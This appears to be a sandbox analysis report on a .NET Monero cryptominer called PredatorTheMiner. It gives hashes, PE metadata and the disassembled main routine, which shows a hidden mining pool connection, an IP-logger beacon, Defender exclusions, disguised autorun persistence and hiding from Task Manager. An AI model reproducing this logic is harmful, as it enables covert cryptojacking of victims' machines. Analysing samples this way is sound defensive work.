Symbol Obfuscation Score

| Hash | Hash Value |
|---|---|
| MD5 | dcf7e0f0d4e16559138bc93bb3239c8c |
| Sha1 | 7186be3136533988a882bd1429d81530b3af762f |
| Sha256 | 71cb35a5b6c82b57ff2586d698a257a64606207ee884d8c86cc711a3c5f5ffee |
| Sha384 | fedc79079b4c5ec54dcc229b9cd71784b75a431d72e4a90aa9f15ba5f144728e266e5bda864e2f6b1f23ea7f71267c80 |
| Sha512 | 36128d15f0b44071b7405f3c3b3730d57dafef26e6d330e42aa6e7ef668835831f577d43d8d06b9f5ccb45679304faa81daa00ff15b5851f85e28bf1fbd66676 |
| SSDeep | 49152:p8zt1S0tH8/SXCsHhJbv/vnvyYN1HFEHJ:+zfp8qX/TnXHvlEp |
| TLSH | CB95237B3695C969C733A2B0A8A3E58CFEA33F1729B683171724738D55BB600C679143 |

PeID

| Name | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | PDB Path: C:\Users\vboxuser\Desktop\Silent-Miner-XMR-Monero-master\obj\Release\PredatorTheMiner.pdb |
| Module Name | PredatorTheMiner.exe |
| Full Name | PredatorTheMiner.exe |
| EntryPoint | System.Void PredatorTheMiner.Program::Main() |
| Scope Name | PredatorTheMiner.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | PredatorTheMiner |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.8 |
| Total Strings | 76 |
| Main Method | System.Void PredatorTheMiner.Program::Main() |
| Main IL Instruction Count | 222 |
| Main IL | ldstr https://iplogger.com/2j5MD5 call System.Boolean PredatorTheMiner.Helper::SiteConnection(System.String) pop <null> newobj System.Void System.Random::.ctor() ldc.i4.1 <null> ldc.i4 100001 callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) stloc.0 <null> call System.String System.Environment::get_MachineName() stloc.1 <null> ldstr worker_{0}_{1} ldloc.0 <null> box System.Int32 ldloc.1 <null> call System.String System.String::Format(System.String,System.Object,System.Object) stloc.2 <null> newobj System.Void System.Diagnostics.Process::.ctor() stloc.3 <null> ldloc.3 <null> callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) ldloc.3 <null> callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) ldloc.3 <null> callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldstr --url={0} --user={1} --pass={4} --donate-level=1 --keepalive --retries=5 --max-cpu-usage={3} --cpu-priority=2 ldc.i4.5 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldstr xmr.kryptex.network:7029 stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr 48sJ3RQVWcR4tHeemmq4cTAwYgTzGeiFWjhSfpphAtmdgDUUX7VMjLUKoWer3FjB8MXLvhocXwcbZUbrQF39gFUAHibpxEM stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr 0x3 stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr 75 stelem.ref <null> dup <null> ldc.i4.4 <null> ldloc.2 <null> stelem.ref <null> call System.String System.String::Format(System.String,System.Object[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldstr LocalAppData call System.String System.Environment::GetEnvironmentVariable(System.String) dup <null> ldstr \Streamm.exe call System.String 
System.String::Concat(System.String,System.String) stloc.s V_4 dup <null> ldstr \runtime-servece.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_5 ldstr \start_miner.vbs call System.String System.String::Concat(System.String,System.String) stloc.s V_6 ldloc.s V_4 ldloc.s V_5 ldloc.s V_6 call System.Void PredatorTheMiner.RunTime/DefenderExclusion::SetupAllExclusions(System.String,System.String,System.String) leave.s IL_00D1: ldloc.s V_4 pop <null> leave.s IL_00D1: ldloc.s V_4 ldloc.s V_4 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_00E8: nop call System.String PredatorTheMiner.Program::get_StartPath() ldloc.s V_4 call System.Boolean System.String::op_Inequality(System.String,System.String) brfalse.s IL_0112: nop nop <null> ldloc.s V_4 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_00F9: call System.String PredatorTheMiner.Program::get_StartPath() ldloc.s V_4 call System.Void System.IO.File::Delete(System.String) call System.String PredatorTheMiner.Program::get_StartPath() ldloc.s V_4 call System.Void System.IO.File::Copy(System.String,System.String) ldloc.s V_4 ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) leave.s IL_0112: nop pop <null> leave.s IL_0112: nop nop <null> ldloc.3 <null> callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() callvirt System.String System.Diagnostics.ProcessStartInfo::get_Arguments() stloc.s V_7 ldstr Set WshShell = CreateObject("WScript.Shell") stloc.s V_8 ldc.i4.6 <null> newarr System.String dup <null> ldc.i4.0 <null> ldloc.s V_8 stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr WshShell.Run """ stelem.ref <null> dup <null> ldc.i4.2 <null> ldloc.s V_5 stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr "" stelem.ref <null> dup <null> ldc.i4.4 <null> ldloc.s V_7 stelem.ref <null> dup <null> ldc.i4.5 <null> ldstr ", 0, False stelem.ref <null> call System.String 
System.String::Concat(System.String[]) stloc.s V_8 ldloc.s V_6 ldloc.s V_8 call System.Void System.IO.File::WriteAllText(System.String,System.String) ldloc.s V_6 ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) leave.s IL_0171: ldc.i4.0 pop <null> leave.s IL_0171: ldc.i4.0 ldc.i4.0 <null> call System.Void PredatorTheMiner.RunTime/Defend::SetupDefend(PredatorTheMiner.RunTime/Defend/DefendOptions) ldstr Windows_launcher newobj System.Void PredatorTheMiner.Implant/ScheduleTask::.ctor(System.String) ldstr wscript.exe " ldloc.s V_6 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) call System.Void PredatorTheMiner.Implant/ScheduleTask::AddTask(System.String) ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) dup <null> ldstr Windows Update Service ldstr wscript.exe " ldloc.s V_6 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) callvirt System.Void Microsoft.Win32.RegistryKey::Close() leave.s IL_01CD: ldloc.s V_5 pop <null> leave.s IL_01CD: ldloc.s V_5 ldloc.s V_5 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_01E2: ldloc.3 ldloc.s V_5 call System.Byte[] PredatorTheMiner.Properties.Resources::get_shost() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.3 <null> callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldloc.s V_5 callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.3 <null> callvirt System.Boolean System.Diagnostics.Process::Start() pop <null> call System.Void PredatorTheMiner.Program::SendTelegramNotification() 
call System.String PredatorTheMiner.Program::get_StartPath() ldloc.s V_4 call System.Boolean System.String::op_Inequality(System.String,System.String) brfalse.s IL_0213: call System.Void PredatorTheMiner.Helper::AuthorFee() call System.Void PredatorTheMiner.Helper::DeleteMe() leave.s IL_0213: call System.Void PredatorTheMiner.Helper::AuthorFee() pop <null> leave.s IL_0213: call System.Void PredatorTheMiner.Helper::AuthorFee() call System.Void PredatorTheMiner.Helper::AuthorFee() ldstr taskmgr call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_027C: ldloc.3 ldstr Taskmgr call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_027C: ldloc.3 ldstr ProcessHacker call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_027C: ldloc.3 call System.Boolean System.Environment::get_HasShutdownStarted() brtrue.s IL_027C: ldloc.3 ldstr ldstr Task Manager call System.IntPtr PredatorTheMiner.Program::FindWindow(System.String,System.String) ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Inequality(System.IntPtr,System.IntPtr) brtrue.s IL_027C: ldloc.3 ldstr ldstr Диспетчер задач call System.IntPtr PredatorTheMiner.Program::FindWindow(System.String,System.String) ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Inequality(System.IntPtr,System.IntPtr) brfalse.s IL_0288: ldc.i4.s 10 ldloc.3 <null> callvirt System.Void System.Diagnostics.Process::Kill() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldc.i4.s 10 call System.Void System.Threading.Thread::Sleep(System.Int32) br.s IL_0218: ldstr "taskmgr" pop <null> leave.s IL_0294: ret ret <null> |